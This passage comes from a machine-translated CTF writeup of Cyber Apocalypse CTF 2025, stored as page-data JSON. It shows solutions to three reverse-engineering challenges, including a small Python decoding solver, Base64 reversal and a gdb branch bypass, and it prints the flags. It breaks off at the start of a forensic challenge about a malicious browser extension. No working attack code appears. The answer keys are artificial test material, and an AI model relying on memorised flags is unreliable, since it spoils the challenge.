{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-cyber-apocalypse-2025-en","result":{"data":{"markdownRemark":{"id":"c700b293-2284-5a08-b6aa-a514b54b6a95","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-cyber-apocalypse-2025\">original page</a>.</p>\n</blockquote>\n<p>I participated in Cyber Apocalypse CTF 2025 with 0nePadding.</p>\n<p>There were many interesting challenges, and I had a great time.</p>\n<p>I still have many challenges left to upsolve, but I will leave a brief writeup for now.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#encryptedscrollrev\">EncryptedScroll(Rev)</a></li>\n<li><a href=\"#sealedrunerev\">SealedRune(Rev)</a></li>\n<li><a href=\"#impossimazerev\">Impossimaze(Rev)</a></li>\n<li><a href=\"#stealth-invasionforensic\">Stealth Invasion(Forensic)</a></li>\n<li><a href=\"#toolpieforensic\">ToolPie(Forensic)</a></li>\n<li><a href=\"#blessingpwn\">Blessing(Pwn)</a></li>\n<li>\n<p><a href=\"#laconicpwn\">Laconic(Pwn)</a></p>\n<ul>\n<li><a href=\"#about-sigreturn-oriented-programmingsrop\">About Sigreturn Oriented Programming(SROP)</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"encryptedscrollrev\" style=\"position:relative;\"><a href=\"#encryptedscrollrev\" aria-label=\"encryptedscrollrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>EncryptedScroll(Rev)</h2>\n<blockquote>\n<p>Elowen Moonsong, an Elven mage of great wisdom, has discovered an ancient scroll rumored to contain the location of The Dragon’s Heart. However, the scroll is enchanted with an old magical cipher, preventing Elowen from reading it.</p>\n</blockquote>\n<p>Decompiling the challenge binary reveals the following function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 683px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3f1b3df3a02cda73b1b6974978c5ff7c/bca35/image-20250327195034529.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 63.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACNUlEQVQ4y32T6XKbQBCEeZAkjjj35FgOIVkSskAIJKUc/0qVq3K8/0t0ZpHsqGxXfnQNLOzQX8/idE8nbPs92r5HezigG86kb9gfH9GfvmM8HzAcT9gPR2x2LZq2+68cOc8QSg4/CMG4gNQxsjyHHzIEEaP1CB6L4NLzmefjK+nLB7ojub4PZ/PjgGJdI81yLFf32DYb7NodNk2DdbNFvViialYo6hpxZlCZAqu8wP2kcqorqguqcZrB6Z8fsR16NITTEfo4HjAeBxxJ+3EgzA4P7R67bj8hPXU9/hxG/OpH/Kb6sx+m+kx1/dDC0esCwRWZiwgh4UVcgglJyPY+QMAIna69MMSdH+DTzMVn131XZ64HpzxvILJ4yk/FAvPFAqtNg5IQTa4JuUBVLwgnBY81fUwgCCMSu9Z/8kmO6ZfgKb3I+LQglSYphLTRsy/SYKwz14rczSh4NwjgEZGVf230IifdVmCxmhwKJZCT23lpkJkchgZQlRWSJJuGxikKrRJIoS8O7cfeNCXkNXh2cZikEmVOx8YYylMiVRnKpESiUpRpiZia1WY+XSuZULb8fUPTL16RI86gCJkLBUXnUWtyozUEiUUCITmyLq0YE1ODdw0Ti5xckEOaZmISaLpP6MxldL7yeo64zMAoCp+e2xxthu5NhrdNneqxmaYcRRySjs+80CiMRprE4FJN6DargF+GZv+cl83etdmtHL00iOQFZ8qwJERB+OTGrllHrxP9YKpv9Rf+yJNxQWMiFQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3f1b3df3a02cda73b1b6974978c5ff7c/8ac56/image-20250327195034529.webp 240w,\n/static/3f1b3df3a02cda73b1b6974978c5ff7c/d3be9/image-20250327195034529.webp 480w,\n/static/3f1b3df3a02cda73b1b6974978c5ff7c/e2d2f/image-20250327195034529.webp 683w\"\n              sizes=\"(max-width: 683px) 100vw, 683px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3f1b3df3a02cda73b1b6974978c5ff7c/8ff5a/image-20250327195034529.png 240w,\n/static/3f1b3df3a02cda73b1b6974978c5ff7c/e85cb/image-20250327195034529.png 480w,\n/static/3f1b3df3a02cda73b1b6974978c5ff7c/bca35/image-20250327195034529.png 683w\"\n            sizes=\"(max-width: 683px) 100vw, 683px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3f1b3df3a02cda73b1b6974978c5ff7c/bca35/image-20250327195034529.png\"\n            alt=\"image-20250327195034529\"\n            title=\"image-20250327195034529\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>By decrypting the hardcoded characters with the following solver, I was able to obtain the Flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">enc <span class=\"token operator\">=</span> <span class=\"token string\">r\"IUC|t2nqm4`gm5h`5s2uin4u2d~\"</span>\nflag <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>enc<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    flag <span class=\"token operator\">+=</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">ord</span><span class=\"token punctuation\">(</span>enc<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># HTB{s1mpl3_fl4g_4r1thm3t1c}</span></code></pre></div>\n<h2 id=\"sealedrunerev\" style=\"position:relative;\"><a href=\"#sealedrunerev\" aria-label=\"sealedrunerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>SealedRune(Rev)</h2>\n<blockquote>\n<p>Elowen has reached the Ruins of Eldrath, where she finds a sealed rune stone glowing with ancient power. The rune is inscribed with a secret incantation that must be spoken to unlock the next step in her journey to find The Dragon’s Heart.</p>\n</blockquote>\n<p>Decompiling the challenge binary reveals the following function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 712px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2c049d03d23a2bbd1e8b24815f3473c7/3d4b6/image-20250327195453428.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 67.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACWElEQVQ4y22T53KjQBCEeQ5bsgISGZZdclBEKNjne/+36etd6Wyryj++6mFDMwwz1mHosTmcsD3eqGcTl02LommQ1y3KtkfVbYzW3TOFPlc3d20ag6XGDtmlxdrz4AUB6rZC1W54sKVuoYoOsSwRpznytDCUfM6orh9i7Xq861PvWK6K4GUx5kvbEEYefBqHUQx7tcZsscB0NsPbfE59ZjZfmH3D/I6VZAqaWEqkSiKRmUGonFlJRCKlfhM9+BlHX/sS1vbK+t1GtLsdhnGPw+mM/elm6PcDut2BekRP3VJ3DzaP5+0j7rd7tJsdLHlqIE81bMcx9ajqHEXVICtq5FXHrGsEsUIQpVCJQiEKFKyfCAUk1xVJuef7Eey1C2uVsJhpYGqi6+T5azieSw1MbV6nb3iZTKhTvE7I6wQvxMR6/cGEz1OetfZXfiI5jGccz/pzGZ/5yeMVw+WKkXvj9Z1rFxx55sT94VdGgzV83jD8fafRaC6MV5rc/tDsg/qB8+2G8/snBv2SYWSNR3P2i+EZK+z5h/c55raNBdvGDx22jQ/HdeH4MdxAUCMsHe+pZd7YIr9hZZcOxccGDk1c34eUCZpSoSxzpCk1K6CoIs0QBgkEf0ASCQRBxFoHWDnuE5yU5mtSHE8bhsgz9pTuP15UIkeZcjKSjHGGSlbmb0vGfpiY6XDYHdrMXjuwxL6E2JXccO9jRFQaMyNpiHhJaoMHBc31WkzDmO0TcS0RCVwmYwyTPqdhcc+QZqkKmZkPxcnRnR8LYV6y5BguV45RfdFe/9dvdJb/AFUMuK+mvJiEAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2c049d03d23a2bbd1e8b24815f3473c7/8ac56/image-20250327195453428.webp 240w,\n/static/2c049d03d23a2bbd1e8b24815f3473c7/d3be9/image-20250327195453428.webp 480w,\n/static/2c049d03d23a2bbd1e8b24815f3473c7/c4538/image-20250327195453428.webp 712w\"\n              sizes=\"(max-width: 712px) 100vw, 712px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2c049d03d23a2bbd1e8b24815f3473c7/8ff5a/image-20250327195453428.png 240w,\n/static/2c049d03d23a2bbd1e8b24815f3473c7/e85cb/image-20250327195453428.png 480w,\n/static/2c049d03d23a2bbd1e8b24815f3473c7/3d4b6/image-20250327195453428.png 712w\"\n            sizes=\"(max-width: 712px) 100vw, 712px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2c049d03d23a2bbd1e8b24815f3473c7/3d4b6/image-20250327195453428.png\"\n            alt=\"image-20250327195453428\"\n            title=\"image-20250327195453428\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>By Base64-decoding the hardcoded string and reversing it, I was able to obtain the Flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b834736fa5e2b30ff36b6ad41686a59e/18539/image-20250327195542278.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 32.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABD0lEQVQoz42QfW+CMBDG+/0/1/7com6+gEHLpkGkhQqUtkjxWencAjFZvOSXu2t6d88dYTmDMgqNbqDuaJcrrWBaAxpTxJ8UaZoiz3Mo5f42zQg5ycni+IpYbHGs9jiUO3yVEXZFCCoCxJcQEV9jm32AlxmqsvZFatRASun5jUl6SSAkR3OtoTqJXBV4oUts2MwxxzqbIeALiIbDdha2t+j7/gFrrYes0zkC9u7V0Dt7p46OKTdI+AHp6QztTjFee4gHjDEesjy/ISqWE3Zi5fzqz4dsAV5lblXtGmpfOG7Yti0Gu91uIIk4QGg2oRghNAeTJ3+SZ4xcagF1lTDWTe7UI+59uK3ptJPwo+I/vgECTRX+v52pYQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b834736fa5e2b30ff36b6ad41686a59e/8ac56/image-20250327195542278.webp 240w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/d3be9/image-20250327195542278.webp 480w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/e46b2/image-20250327195542278.webp 960w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/2b317/image-20250327195542278.webp 1074w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b834736fa5e2b30ff36b6ad41686a59e/8ff5a/image-20250327195542278.png 240w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/e85cb/image-20250327195542278.png 480w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/d9199/image-20250327195542278.png 960w,\n/static/b834736fa5e2b30ff36b6ad41686a59e/18539/image-20250327195542278.png 1074w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b834736fa5e2b30ff36b6ad41686a59e/d9199/image-20250327195542278.png\"\n            alt=\"image-20250327195542278\"\n            title=\"image-20250327195542278\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"impossimazerev\" style=\"position:relative;\"><a href=\"#impossimazerev\" aria-label=\"impossimazerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Impossimaze(Rev)</h2>\n<blockquote>\n<p>Elowen has been cursed to roam forever in an inescapable maze. You need to break her curse and set her free.</p>\n</blockquote>\n<p>Decompiling the challenge binary showed that it is a binary that performs window operations using ncurses.</p>\n<p>ncurses is a library with functionality like the following.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 890px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/93c38270513bd631c1c3ebd6e85875f9/4ef49/image-20250322085347091.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 13.750000000000002%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAtUlEQVQI1x2OwW6DMBAFLReJU1pUkzgGbJxiGzDQnNL+/5dNXQ6j1T7taJ/4tDWPTePCncEHdD/ipkTcnnzNeyHj48pHa05U23K9tlzeLwghkFJSVdVJXdf/mSTGRAgB5waMuTNND3Ke2baFeY4sS8J7R9+bcjeVPBNiIJf58/vCjY6u7+g6g5BvkrkIqYjOWWwhplj2xOhH1nXh+D5OeT/28milaRq01lg7cNO30lqhlDob/wE8Ck+7dzaw+AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/93c38270513bd631c1c3ebd6e85875f9/8ac56/image-20250322085347091.webp 240w,\n/static/93c38270513bd631c1c3ebd6e85875f9/d3be9/image-20250322085347091.webp 480w,\n/static/93c38270513bd631c1c3ebd6e85875f9/8d1ba/image-20250322085347091.webp 890w\"\n              sizes=\"(max-width: 890px) 100vw, 890px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/93c38270513bd631c1c3ebd6e85875f9/8ff5a/image-20250322085347091.png 240w,\n/static/93c38270513bd631c1c3ebd6e85875f9/e85cb/image-20250322085347091.png 480w,\n/static/93c38270513bd631c1c3ebd6e85875f9/4ef49/image-20250322085347091.png 890w\"\n            sizes=\"(max-width: 890px) 100vw, 890px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/93c38270513bd631c1c3ebd6e85875f9/4ef49/image-20250322085347091.png\"\n            alt=\"image-20250322085347091\"\n            title=\"image-20250322085347091\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 638px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/748abb1cac8e267925fb54b26789ab3d/41be6/image-20250322085520491.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 45.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRklEQVQoz41SW26DMBDkGv0IJErDIxAgxkCwsYGmSe5/ounuqomqqpX4GK1trefhdaDCNwyXHp+3O67XKx6PO+q6wmazQRRFL4RhKPi9577nervdIsiORxTFSVCWJyRpSoQ1Jj+hqioo1aBtWzSNwjAMUpVS6Lse6qykdxwdrDWI4xgBN91vNxhj4MYR8zRJUxInOBwOSEmAkWUpjiTOlxhZlsk+z3MUeYGc1vv9HgEfdl0nqg25macZXd9/k8av6GEY/Rn5JyTyO7nQjZZYTOwpqvNeYvAZqzLBbrdbhYCtW2OxLB8YLUVeZnjnYQYDz/HPtZCyOl941n8J2WFZlqhpABzTOXKmW3KnJfqF3pidryETQn5gTQSOXD2nxgLOjTJlnp61Vr7SmuhBnCTigN+rpbosC+Z5IhEN3Xaw5Jh/ApOvIfwCAuQONyqRuewAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/748abb1cac8e267925fb54b26789ab3d/8ac56/image-20250322085520491.webp 240w,\n/static/748abb1cac8e267925fb54b26789ab3d/d3be9/image-20250322085520491.webp 480w,\n/static/748abb1cac8e267925fb54b26789ab3d/a2d8a/image-20250322085520491.webp 638w\"\n              sizes=\"(max-width: 638px) 100vw, 638px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/748abb1cac8e267925fb54b26789ab3d/8ff5a/image-20250322085520491.png 240w,\n/static/748abb1cac8e267925fb54b26789ab3d/e85cb/image-20250322085520491.png 480w,\n/static/748abb1cac8e267925fb54b26789ab3d/41be6/image-20250322085520491.png 638w\"\n            sizes=\"(max-width: 638px) 100vw, 638px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/748abb1cac8e267925fb54b26789ab3d/41be6/image-20250322085520491.png\"\n            alt=\"image-20250322085520491\"\n            title=\"image-20250322085520491\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Analyzing the challenge binary in more detail, I noticed a conditional branch that executes special processing only when the window’s x and y sizes have particular values.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/56f5d42406a03092636004ba307ff45e/280a1/image-20250322090459432.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 28.333333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABOklEQVQY022RyXLcMAxE9Q+p8SWxZzzWQq0kRVHUQim2k0P+/4deII0POeTQ1VUE2EA3ksvlCT0NxPedZd95K3K+XS7cXu90wVH6jjzLMaaltJa613S6YTGGSilUWZIVivtbeiKZPjambSV+7EwxMsaNzvWn4PzrJ+NnxPQDv+PCtkaGdZaeFTN4jBuk5h78hcR4h/MDbvRo59DSkMvU6+0Vt03o6FFVTZC+YZwwcaax5nz7HxLlWqbPlTAFfAx0Ivj9+YWX6w29eOrJkqY5VVNRNrWgQdU19zR72Dz4HyTN3BP/vBPjYXvFzQvPst2xoV0DjQhmuWRVVVirKduOpq1pdEtRt+KmOnMspV4IJ6pv8fvMEEZs8JKf58f1emZol5E6mIegfCzFUqZKcjlCLgc5jpEWBxdfUPwFmp+4ChDhZskAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/56f5d42406a03092636004ba307ff45e/8ac56/image-20250322090459432.webp 240w,\n/static/56f5d42406a03092636004ba307ff45e/d3be9/image-20250322090459432.webp 480w,\n/static/56f5d42406a03092636004ba307ff45e/e46b2/image-20250322090459432.webp 960w,\n/static/56f5d42406a03092636004ba307ff45e/f992d/image-20250322090459432.webp 1440w,\n/static/56f5d42406a03092636004ba307ff45e/cfccf/image-20250322090459432.webp 1545w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/56f5d42406a03092636004ba307ff45e/8ff5a/image-20250322090459432.png 240w,\n/static/56f5d42406a03092636004ba307ff45e/e85cb/image-20250322090459432.png 480w,\n/static/56f5d42406a03092636004ba307ff45e/d9199/image-20250322090459432.png 960w,\n/static/56f5d42406a03092636004ba307ff45e/07a9c/image-20250322090459432.png 1440w,\n/static/56f5d42406a03092636004ba307ff45e/280a1/image-20250322090459432.png 1545w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/56f5d42406a03092636004ba307ff45e/d9199/image-20250322090459432.png\"\n            alt=\"image-20250322090459432\"\n            title=\"image-20250322090459432\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>When I used gdb to bypass this conditional branch and force the processing to run, I was able to obtain the Flag as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 436px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/bbdb15062c19277ac0cbf076ee3c7276/8574c/image-20250322090440613.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 66.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACVUlEQVQ4y1VTaZOaQBAdT1RUEBTvFfEA1FU3WnGj8diq7Pe4//+/vPRrY6XyYWqAafr1O8aMwhd0ux0MhgPYto1yuYyKXUGl8v8qV8oolSxZJa157CWUyv/euUyv10VHGhaLRdTrdTiOA2MMqlUb+XweLyMCdjEKR7heLxgMBtqEoM1mE7PZDIVCAbV6DbvdDma1WiIIAmSyGcTxHJ+fv3RiNmWh53no9/toNBq6r15X8H0faZpqE55blgXHdfDxceOEPURRpJRc15UJ+rqz4XK5QKvVgttwVY5sNqv01+u1AmQyGeRyOTRbTXQ6HVwuZxge1Go1LBapTsRGLOIUnPx4/CHUfAFx9CfqlM1lEYah0p1Op1p3Pv/E4fAdxm8+xm+322rMeByqXvw+n88EaKHaUhpSGommZEWabMp36vo00xBxKI222w32+72snRSNFPl2uwntpU7GNZ1OsNmsBWiu1GlKRaQ6nU7SY/hwmXrxkIh0k9MQLY5joXvUyeh8FI1VR0oUCgMmgDKRSZLEqjsBjOM8GtAlfrRlbLr8/n5Qbejs9XrF19ddXa3LehpJM6ivLRGjcXw2dI5OziUynu+JQVXJYFUF506jOB31ogwtafL2tlWzWM8aTpskiWbZjMdj5d/r9yQOr5pFUvO8xt9sxngmgZnjVGmaqDQEJ2Aq1GkO42T0JshtIRp/Zg4JEgQtFTmaROBtCtqB3p7NZqO0LbmGNJD69WUYgjIpxrKKmjsiUUNeq93uGybiKO8umyitQl614xl1Zbzo7v3+W2vIgJL8AZyoTKrnop68AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/bbdb15062c19277ac0cbf076ee3c7276/8ac56/image-20250322090440613.webp 240w,\n/static/bbdb15062c19277ac0cbf076ee3c7276/bfa8c/image-20250322090440613.webp 436w\"\n              sizes=\"(max-width: 436px) 100vw, 436px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/bbdb15062c19277ac0cbf076ee3c7276/8ff5a/image-20250322090440613.png 240w,\n/static/bbdb15062c19277ac0cbf076ee3c7276/8574c/image-20250322090440613.png 436w\"\n            sizes=\"(max-width: 436px) 100vw, 436px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/bbdb15062c19277ac0cbf076ee3c7276/8574c/image-20250322090440613.png\"\n            alt=\"image-20250322090440613\"\n            title=\"image-20250322090440613\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"stealth-invasionforensic\" style=\"position:relative;\"><a href=\"#stealth-invasionforensic\" aria-label=\"stealth invasionforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stealth Invasion(Forensic)</h2>\n<blockquote>\n<p>Selene’s normally secure laptop recently fell victim to a covert attack. Unbeknownst to her, a malicious Chrome extension was stealthily installed, masquerading as a useful productivity tool. Alarmed by unusual network activity, Selene is now racing against time to trace the intrusion, remove the malicious software, and bolster her digital defenses before more damage is done.</p>\n</blockquote>\n<p>This challenge required analyzing the provided memory dump and identifying the following six 